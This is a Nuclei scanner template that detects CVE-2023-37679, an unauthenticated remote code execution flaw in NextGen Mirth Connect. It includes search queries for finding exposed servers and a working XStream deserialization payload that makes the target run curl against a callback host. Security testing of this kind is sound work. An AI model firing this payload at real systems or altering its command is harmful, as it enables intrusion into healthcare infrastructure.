nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability    
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.07052
    epss-percentile: 0.9396
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI        
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>        

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950